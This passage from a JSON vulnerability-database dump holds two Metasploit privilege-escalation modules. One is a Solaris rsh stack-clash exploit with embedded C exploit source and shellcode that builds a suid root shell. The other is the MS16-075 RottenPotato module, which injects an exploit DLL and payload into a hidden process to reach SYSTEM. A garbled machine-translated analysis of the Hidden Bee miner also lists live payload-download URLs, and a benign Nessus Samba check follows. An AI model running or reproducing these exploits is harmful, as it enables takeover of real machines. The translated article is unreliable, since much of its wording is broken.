'Automatic'\n case kernel_version\n when '11.1'\n my_target = targets[1]\n arg = 0\n when '11.3'\n my_target = targets[2]\n arg = 1\n else\n fail_with Failure::NoTarget, 'Unable to automatically select a target'\n end\n else\n my_target = target\n end\n print_status \"Using target: #{my_target.name}\"\n\n base_path = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}\"\n mkdir base_path\n\n # Solaris_rsh.c by Qualys\n # modified for Metasploit\n workers = datastore['WORKERS'].to_i\n root_shell = 'ROOT'\n shellcode = '\\x31\\xc0\\x50\\x68'\n shellcode << root_shell\n shellcode << '\\x89\\xe3\\x50\\x53\\x89\\xe2\\x50\\x50'\n shellcode << '\\x52\\x53\\xb0\\x3C\\x48\\x50\\xcd\\x91'\n shellcode << '\\x31\\xc0\\x40\\x50\\x50\\xcd\\x91Z'\n exp = <<-EOF\n/*\n * Solaris_rsh.c for CVE-2017-3630, CVE-2017-3629, CVE-2017-3631\n * Copyright (C) 2017 Qualys, Inc.\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. 
If not, see <http://www.gnu.org/licenses/>.\n */\n\n#include <errno.h>\n#include <fcntl.h>\n#include <signal.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/fcntl.h>\n#include <sys/resource.h>\n#include <sys/stat.h>\n#include <sys/time.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <unistd.h>\n\n#ifndef timersub\n#define timersub(a, b, result) \\\\\n do { \\\\\n (result)->tv_sec = (a)->tv_sec - (b)->tv_sec; \\\\\n (result)->tv_usec = (a)->tv_usec - (b)->tv_usec; \\\\\n if ((result)->tv_usec < 0) { \\\\\n --(result)->tv_sec; \\\\\n (result)->tv_usec += 1000000; \\\\\n } \\\\\n } while (0)\n#endif\n\n#define RSH \"#{rsh_path}\"\nstatic const struct target * target;\nstatic const struct target {\n const char * name;\n size_t s_first, s_last, s_step;\n size_t l_first, l_last, l_step;\n size_t p_first, p_last, p_step;\n size_t a, b;\n size_t i, j;\n}\ntargets[] = {\n {\n .name = \"Oracle Solaris 11.1 X86 (Assembled 19 September 2012)\",\n .s_first = 16*1024, .s_last = 44*1024, .s_step = 4096,\n .l_first = 192, .l_last = 512, .l_step = 16,\n .p_first = 0, .p_last = 8192, .p_step = 1,\n .a = 0, .b = 15, .j = 12,\n .i = 0x08052608 /* pop edx; pop ebp; ret */\n },\n {\n .name = \"Oracle Solaris 11.3 X86 (Assembled 06 October 2015)\",\n .s_first = 12*1024, .s_last = 44*1024, .s_step = 4096,\n .l_first = 96, .l_last = 512, .l_step = 4,\n .p_first = 0, .p_last = 4096, .p_step = 4,\n .a = 0, .b = 3, .j = SIZE_MAX,\n .i = 0x07faa7ea /* call *0xc(%ebp) */\n },\n};\n\n#define ROOTSHELL \"#{root_shell}\"\nstatic const char shellcode[] = \"#{shellcode}\";\n\nstatic volatile sig_atomic_t sigalarm;\n\nstatic void\nsigalarm_handler(const int signum __attribute__((__unused__)))\n{\n sigalarm = 1;\n}\n\n#define die() do { \\\\\n fprintf(stderr, \"died in %s: %u\\\\n\", __func__, __LINE__); \\\\\n exit(EXIT_FAILURE); \\\\\n} while (0)\n\nstatic int\nis_suid_root(const char * const file)\n{\n if (!file) die();\n static 
struct stat sbuf;\n if (stat(file, &sbuf)) die();\n if (!S_ISREG(sbuf.st_mode)) die();\n return ((sbuf.st_uid == 0) && (sbuf.st_mode & S_ISUID));\n}\n\nstatic const char *\nbuild_lca(const size_t l)\n{\n static const size_t shellcode_len = sizeof(shellcode)-1;\n if (shellcode_len > 64) die();\n if (shellcode_len % 16) die();\n if (l < shellcode_len + target->a + target->b) die();\n\n #define LCA_MAX 4096\n if (l > LCA_MAX) die();\n static char lca[128 + LCA_MAX];\n strcpy(lca, \"LC_ALL=\");\n char * cp = memchr(lca, '\\\\0', sizeof(lca));\n if (!cp) die();\n memcpy(cp, shellcode, shellcode_len);\n cp += shellcode_len;\n memset(cp, 'a', target->a);\n\n size_t o;\n for (o = target->a; l - o >= 4; o += 4) {\n if ((o - target->a) % 16 == target->j) {\n cp[o + 0] = '\\\\xeb';\n cp[o + 1] = (o - target->a >= 16) ? -(16u + 2u) :\n -(shellcode_len + target->a + target->j + 2);\n cp[o + 2] = 'j';\n cp[o + 3] = 'j';\n } else {\n if (sizeof(size_t) != 4) die();\n *(size_t *)(cp + o) = target->i;\n }\n }\n cp += o;\n memset(cp, 'b', target->b);\n cp[target->b] = '\\\\0';\n if (strlen(lca) != 7 + shellcode_len + o + target->b) die();\n return lca;\n}\n\nstatic const char *\nbuild_pad(const size_t p)\n{\n #define PAD_MAX 8192\n if (p > PAD_MAX) die();\n static char pad[64 + PAD_MAX];\n strcpy(pad, \"P=\");\n char * const cp = memchr(pad, '\\\\0', sizeof(pad));\n if (!cp) die();\n memset(cp, 'p', p);\n cp[p] = '\\\\0';\n if (strlen(pad) != 2 + p) die();\n return pad;\n}\n\nstatic void\nfork_worker(const size_t s, const char * const lca, const char * const pad)\n{\n #define N_WORKERS #{workers.to_i}\n static size_t n_workers;\n static struct {\n pid_t pid;\n struct timeval start;\n } workers[N_WORKERS];\n\n size_t i_worker;\n struct timeval start, stop, diff;\n\n if (n_workers >= N_WORKERS) {\n if (n_workers != N_WORKERS) die();\n int is_suid_rootshell = 0;\n for (;;) {\n sigalarm = 0;\n #define TIMEOUT 10\n alarm(TIMEOUT);\n int status = 0;\n const pid_t pid = waitpid(-1, 
&status, WUNTRACED);\n alarm(0);\n if (gettimeofday(&stop, NULL)) die();\n\n if (pid <= 0) {\n if (pid != -1) die();\n if (errno != EINTR) die();\n if (sigalarm != 1) die();\n }\n int found_pid = 0;\n for (i_worker = 0; i_worker < N_WORKERS; i_worker++) {\n const pid_t worker_pid = workers[i_worker].pid;\n if (worker_pid <= 0) die();\n if (worker_pid == pid) {\n if (found_pid) die();\n found_pid = 1;\n if (WIFEXITED(status) || WIFSIGNALED(status))\n workers[i_worker].pid = 0;\n } else {\n timersub(&stop, &workers[i_worker].start, &diff);\n if (diff.tv_sec >= TIMEOUT)\n if (kill(worker_pid, SIGKILL)) die();\n }\n }\n if (!found_pid) {\n if (pid != -1) die();\n continue;\n }\n if (WIFEXITED(status)) {\n if (WEXITSTATUS(status) != EXIT_FAILURE)\n fprintf(stderr, \"exited %d\\\\n\", WEXITSTATUS(status));\n break;\n } else if (WIFSIGNALED(status)) {\n if (WTERMSIG(status) != SIGSEGV)\n fprintf(stderr, \"signal %d\\\\n\", WTERMSIG(status));\n break;\n } else if (WIFSTOPPED(status)) {\n fprintf(stderr, \"stopped %d\\\\n\", WSTOPSIG(status));\n is_suid_rootshell |= is_suid_root(ROOTSHELL);\n if (kill(pid, SIGKILL)) die();\n continue;\n }\n fprintf(stderr, \"unknown %d\\\\n\", status);\n die();\n }\n if (is_suid_rootshell) {\n system(\"ls -lL \" ROOTSHELL);\n exit(EXIT_SUCCESS);\n }\n n_workers--;\n }\n if (n_workers >= N_WORKERS) die();\n\n static char rsh_link[64];\n if (*rsh_link != '/') {\n const int rsh_fd = open(RSH, O_RDONLY);\n if (rsh_fd <= STDERR_FILENO) die();\n if ((unsigned int)snprintf(rsh_link, sizeof(rsh_link),\n \"/proc/%ld/fd/%d\", (long)getpid(), rsh_fd) >= sizeof(rsh_link)) die();\n if (access(rsh_link, R_OK | X_OK)) die();\n if (*rsh_link != '/') die();\n }\n\n static int null_fd = -1;\n if (null_fd <= -1) {\n null_fd = open(\"/dev/null\", O_RDWR);\n if (null_fd <= -1) die();\n }\n\n const pid_t pid = fork();\n if (pid <= -1) die();\n if (pid == 0) {\n const struct rlimit stack = { s, s };\n if (setrlimit(RLIMIT_STACK, &stack)) die();\n\n if 
(dup2(null_fd, STDIN_FILENO) != STDIN_FILENO) die();\n if (dup2(null_fd, STDOUT_FILENO) != STDOUT_FILENO) die();\n if (dup2(null_fd, STDERR_FILENO) != STDERR_FILENO) die();\n\n static char * const argv[] = { rsh_link, \"-?\", NULL };\n char * const envp[] = { (char *)lca, (char *)pad, NULL };\n execve(*argv, argv, envp);\n die();\n }\n if (gettimeofday(&start, NULL)) die();\n for (i_worker = 0; i_worker < N_WORKERS; i_worker++) {\n const pid_t worker_pid = workers[i_worker].pid;\n if (worker_pid > 0) continue;\n if (worker_pid != 0) die();\n workers[i_worker].pid = pid;\n workers[i_worker].start = start;\n n_workers++;\n return;\n }\n die();\n}\n\nint main(const int argc, const char * const argv[])\n{\n static const struct rlimit core;\n if (setrlimit(RLIMIT_CORE, &core)) die();\n\n if (geteuid() == 0) {\n if (is_suid_root(ROOTSHELL)) {\n if (setuid(0)) die();\n if (setgid(0)) die();\n static char * const argv[] = { \"/bin/sh\", NULL };\n execve(*argv, argv, NULL);\n die();\n }\n chown(*argv, 0, 0);\n chmod(*argv, 04555);\n for (;;) {\n raise(SIGSTOP);\n sleep(1);\n }\n die();\n }\n\n const size_t i = strtoul(argv[1], NULL, 10);\n if (i >= sizeof(targets)/sizeof(*targets)) die();\n target = targets + i;\n fprintf(stderr, \"Target %zu %s\\\\n\", i, target->name);\n\n if (target->a >= 16) die();\n if (target->b >= 16) die();\n if (target->i <= 0) die();\n if (target->j >= 16 || target->j % 4) {\n if (target->j != SIZE_MAX) die();\n }\n\n static const struct sigaction sigalarm_action = { .sa_handler = sigalarm_handler };\n if (sigaction(SIGALRM, &sigalarm_action, NULL)) die();\n\n size_t s;\n for (s = target->s_first; s <= target->s_last; s += target->s_step) {\n if (s % target->s_step) die();\n\n size_t l;\n for (l = target->l_first; l <= target->l_last; l += target->l_step) {\n if (l % target->l_step) die();\n const char * const lca = build_lca(l);\n fprintf(stdout, \"s %zu l %zu\\\\n\", s, l);\n\n size_t p;\n for (p = target->p_first; p <= target->p_last; p += 
target->p_step) {\n if (p % target->p_step) die();\n const char * const pad = build_pad(p);\n fork_worker(s, lca, pad);\n }\n }\n }\n fprintf(stdout, \"Failed\\\\n\");\n}\n EOF\n\n exploit_name = \".#{rand_text_alphanumeric 5..15}\"\n upload_and_compile \"#{base_path}/#{exploit_name}\", exp\n symlink \"#{base_path}/#{exploit_name}\", \"#{base_path}/#{root_shell}\"\n\n print_status \"Creating suid root shell. This may take a while...\"\n cmd_exec \"cd #{base_path}\"\n start = Time.now\n output = cmd_exec \"./#{exploit_name} #{arg}\", nil, 1_800\n stop = Time.now\n print_status \"Completed in #{(stop - start).round(2)}s\"\n unless output.include? 'root'\n fail_with Failure::Unknown, \"Failed to create suid root shell: #{output}\"\n end\n print_good \"suid root shell created: #{base_path}/#{root_shell}\"\n\n payload_name = \".#{rand_text_alphanumeric 5..10}\"\n payload_path = \"#{base_path}/#{payload_name}\"\n upload payload_path, payload.encoded\n cmd_exec \"chmod +x '#{payload_path}'\"\n\n print_status 'Executing payload...'\n cmd_exec \"echo #{payload_path} | ./#{root_shell} & echo \"\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/solaris/local/rsh_stack_clash_priv_esc.rb"}, {"lastseen": "2019-11-25T20:45:24", "bulletinFamily": "exploit", "description": "Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. 
Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token.\n", "modified": "2018-10-04T21:38:35", "published": "2018-08-03T06:09:24", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION", "href": "", "type": "metasploit", "title": "Windows Net-NTLMv2 Reflection DCOM/RPC", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/windows/reflective_dll_injection'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC',\n 'Description' => %q(\n Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege. 
Currently the module\n does not spawn as SYSTEM, however once achieving a shell, one can easily\n use incognito to impersonate the token.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'FoxGloveSec', # the original Potato exploit\n 'breenmachine', # Rotten Potato NG!\n 'Mumbai' # Austin : port of RottenPotato for reflection & quick module\n ],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'none',\n 'WfsDelay' => '20'\n },\n 'Targets' =>\n [\n ['Automatic', {}],\n ['Windows x86', { 'Arch' => ARCH_X86 }],\n ['Windows x64', { 'Arch' => ARCH_X64 }]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'References' =>\n [\n ['MSB', 'MS16-075'],\n ['CVE', '2016-3225'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],\n ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],\n ['URL', 'https://github.com/breenmachine/RottenPotatoNG']\n ],\n 'DisclosureDate' => 'Jan 16 2016',\n 'DefaultTarget' => 0\n }))\n end\n\n def assign_target\n if target.name == 'Automatic'\n case sysinfo[\"Architecture\"]\n when 'x86'\n vprint_status(\"Found we are on an x86 target\")\n my_target = targets[1]\n when 'x64'\n vprint_status(\"Found we are on an x64 target\")\n my_target = targets[2]\n else\n fail_with(Failure::NoTarget, \"Unable to determine target\")\n end\n else\n my_target = target\n end\n return my_target\n end\n\n def verify_arch(my_target)\n if my_target[\"Arch\"] != sysinfo[\"Architecture\"]\n print_error(\"Assigned Target Arch = #{my_target.opts['Arch']}\")\n print_error(\"Actual Target Arch = #{sysinfo['Architecture']}\")\n fail_with(Failure::BadConfig, \"Assigned Arch does not match reality\")\n end\n if client.arch != sysinfo[\"Architecture\"]\n fail_with(Failure::BadConfig, \"Session/Target Arch mismatch; WOW64 not 
supported\")\n else\n vprint_good(\"Current payload and target Arch match....\")\n end\n end\n\n def check\n privs = client.sys.config.getprivs\n if privs.include?('SeImpersonatePrivilege')\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n my_target = assign_target\n print_status(\"#{my_target['Arch']}\")\n verify_arch(my_target)\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege')\n end\n if my_target.opts['Arch'] == 'x64'\n dll_file_name = 'rottenpotato.x64.dll'\n vprint_status(\"Assigning payload rottenpotato.x64.dll\")\n elsif my_target.opts['Arch'] == 'x86'\n dll_file_name = 'rottenpotato.x86.dll'\n vprint_status(\"Assigning payload rottenpotato.x86.dll\")\n else\n fail_with(Failure::BadConfig, \"Unknown target arch; unable to assign exploit code\")\n end\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\n begin\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n library_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"rottenpotato\", dll_file_name)\n library_path = ::File.expand_path(library_path)\n print_status(\"Injecting exploit into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n print_status(\"Exploit injected. 
Injecting payload into #{process.pid}...\")\n payload_mem = inject_into_process(process, payload.encoded)\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms16_075_reflection.rb"}], "myhack58": [{"lastseen": "2018-08-07T13:58:25", "bulletinFamily": "info", "description": "! [](/Article/UploadPic/2018-8/2018871743799. jpg? www. myhack58. com) \nWrite in front of words \nRecently we found a to attempt to exploit CVE-2018-4878 Flash Player vulnerability, vulnerability to attack, its sequence and we currently find any loopholes to use the tool are not the same. After investigation, we found that this is a Chinese security company qihoo 360 in by the end of 2017 the reference to the existing developed part of the framework. But at the time the payload seems to be a promotion of the adware Trojan. And this time, use of the payload it is not a standard PE file. On the contrary, it is more like a multi-stage executable format, and it also acts as a download loader, is used to retrieve hidden Bee miner botnet using the LUA script. This may be the first used mining Crypto-currencies of the bootkit case. \nAdvertising overview \nThe attacker is using the adult site of the temptation of advertising will be the victim attracted to the phishing page. We believe that this series of ads is mainly for Asian countries, the region of the user, according to the ads and our known data. 
This claim is can be online Dating services of the server that contains a malicious iframe, which is mainly responsible for the development and infected users. \n! [](/Article/UploadPic/2018-8/2018871743829. png? www. myhack58. com) \n! [](/Article/UploadPic/2018-8/2018871743182. png? www. myhack58. com) \nIE exploit \nHere, the malicious code from having embedded encryption block of the web page begins execution. And the use of Base64 encoding and then RC4 or Rabbit two algorithms, one for encryption: \n! [](/Article/UploadPic/2018-8/2018871743257. png? www. myhack58. com) \nAfter decryption, the block will be executed. Here you can find a running Java Script the decoded version. We may be in the script to see, it will generate a random session key, then use the attacker's public RSA key to encrypt to: \n! [](/Article/UploadPic/2018-8/2018871743598. png? www. myhack58. com) \nThe encrypted key will be passed to the next function and converted to JSON format, to a hard-coded URL to perform the POST request: \n! [](/Article/UploadPic/2018-8/2018871743101. png? www. myhack58. com) \nIf we view the client and the server traffic between the client sends the encrypted\u201ckey\u201d, the server response\u201cvalue\u201d, we more clearly find this: \n! [](/Article/UploadPic/2018-8/2018871743454. png? www. myhack58. com) \nServer-side \n1. The attacker of using a private RSA key encryption, the server passes the decryption of the session key. \n2. Select a symmetric algorithm(Rabbit or RC4)encryption vulnerability payload in. \n3. The encrypted content is returned to the client. Since the client in memory still has the key to the unencrypted version, so it can decrypt and execute the vulnerability. However, only from the communication flow can not retrieve the original session key, it is impossible to reproduce the vulnerability. But fortunately, we in the dynamic analysis in the successful capture of a vulnerability. 
And we found the attacker exploited a vulnerability is CVE-2018-8174 to. \nFlash exploit \nThis is a relatively new Flash Vulnerability, CVE-2018-4878 use the program,in the odd Tiger 360 released document when it is not their exploit kits are part of, may be in order to enhance its performance later add. The vulnerability is in the embedded shell code is just the next stage of the download procedure. Successfully exploited, it will be in the following URL to retrieve the payload: \n! [](/Article/UploadPic/2018-8/2018871744139. png? www. myhack58. com) \nThis extension. wasm file forged into a Web Assembler module. But in fact, it is something completely different. \nAs you can see, it loads for decompressing cabinet file Cabinet. dll module. In a later section, we saw used by the HTTP Protocol to communicate with API and string. We also found that the\u201cdllhost.exe\u201dand\u201cbin/i386/core. sdb\u201dreferences. \n! [](/Article/UploadPic/2018-8/2018871744180. png? www. myhack58. com) \nWe are very easy to guess this module will download and use the dllhost. exe to run. And another string the Base64-encoded content: \n! [](/Article/UploadPic/2018-8/2018871744342. png? www. myhack58. com) \nWhich after decoding of the content to show more of the URL: \nhttp://103.35.72.223/git/wiki.asp?id=530475f52527a9ae1813d529653e9501 \nhttp://103.35.72.223/git/glfw.wasm \nhttp://103.35.72.223/rt/lsv3i06rrmcu491c3tv82uf228.wasm \nLook at the Fiddler capture of the traffic, we found that the module is indeed in the query these URL: \n! [](/Article/UploadPic/2018-8/2018871744460. png? www. myhack58. com) \n\u8bf7\u6c42\u6765\u81eadllhost.exe this may mean that the above executable files have been injected malicious code. File glfw. wasm with the Web Assembly between The have nothing in common. In fact, it is a Cabinet file that contains the internal path of the package content: bin/i386/core. sdb. 
Seen from inside, we find the same custom executable format, such as DLL names: \n! [](/Article/UploadPic/2018-8/2018871744279. png? www. myhack58. com)\n\n**[1] [[2]](<91130_2.htm>) [next](<91130_2.htm>)**\n", "modified": "2018-08-07T00:00:00", "published": "2018-08-07T00:00:00", "id": "MYHACK58:62201891130", "href": "http://www.myhack58.com/Article/html/3/62/2018/91130.htm", "title": "To see the Hidden Bee how to use a new vulnerability propagation-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "description": "Remote command execution vulnerability in Drupal core/lib/Drupal/Core/DrupalKernel.php\n\nVulnerability Type: Remote Command Execution", "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "E-638", "href": "", "type": "dsquare", "title": "Drupal 8 SA-CORE-2018-002 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-04-08T18:10:54", "bulletinFamily": "exploit", "description": "SQL Injection vulnerabilty in Zenario CMS X-FORWARDED-FOR header\n\nVulnerability Type: SQL Injection", "modified": "2018-03-20T00:00:00", "published": "2018-03-20T00:00:00", "id": "E-631", "href": "", "type": "dsquare", "title": "Zenario CMS SQL Injection", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2019-11-09T11:33:52", "bulletinFamily": "scanner", "description": "The version of Samba running on the remote host is 4.5.x prior to\n4.5.16, or 4.6.x prior to 4.6.14, or 4.7.x prior to 4.7.6. 
It is,\ntherefore, affected by a remote DoS and a remote password manipulation\nvulnerability.\n\nNote: Refer to the advisories for possible workarounds.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application", "modified": "2019-11-02T00:00:00", "id": "SAMBA_4_7_6.NASL", "href": "https://www.tenable.com/plugins/nessus/108378", "published": "2018-03-15T00:00:00", "title": "Samba 4.5.x < 4.5.16 / 4.6.x < 4.6.14 / 4.7.x < 4.7.6 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108378);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_bugtraq_id(103382, 103387);\n\n script_name(english:\"Samba 4.5.x < 4.5.16 / 4.6.x < 4.6.14 / 4.7.x < 4.7.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Samba.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Samba server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Samba running on the remote host is 4.5.x prior to\n4.5.16, or 4.6.x prior to 4.6.14, or 4.7.x prior to 4.7.6. 
It is,\ntherefore, affected by a remote DoS and a remote password manipulation\nvulnerability.\n\nNote: Refer to the advisories for possible workarounds.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2018-1050.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2018-1057.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-4.5.16.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-4.6.14.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-4.7.6.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Samba version 4.5.16 / 4.6.14 / 4.7.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-1057\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/15\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\", \"SMB/samba\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\nlanman = get_kb_item_or_exit(\"SMB/NativeLanManager\");\n\nif (\"Samba \" >!< lanman) audit(AUDIT_NOT_LISTEN, \"Samba\", port);\n\nversion = lanman - 'Samba ';\n\nif (version =~ \"^4(\\.[5-9])?$\")\n audit(AUDIT_VER_NOT_GRANULAR, \"Samba\", port, version);\n\nfix = NULL;\n\nregexes = make_array(-2, \"a(\\d+)\", -1, \"rc(\\d+)\");\n\n# Affected :\n# Note versions prior to 4.6 are EoL\n# https://wiki.samba.org/index.php/Samba_Release_Planning\n#\n# We are including a 4.5.x check because they did release 4.5.16\n# 4.5.x < 4.5.16\n# 4.6.x < 4.6.14\n# 4.7.x < 4.7.6\nif (version =~ \"^4\\.5\\.\")\n fix = '4.5.16';\nelse if (version =~ \"^4\\.6\\.\")\n fix = '4.6.14';\nelse if (version =~ \"^4\\.7\\.\")\n fix = '4.7.6';\n\nif ( !isnull(fix) &&\n (ver_compare(ver:version, fix:fix, regexes:regexes) < 0) &&\n (ver_compare(ver:version, fix:'4.0.0', regexes:regexes) >= 0) )\n{\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Samba\", port, version);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}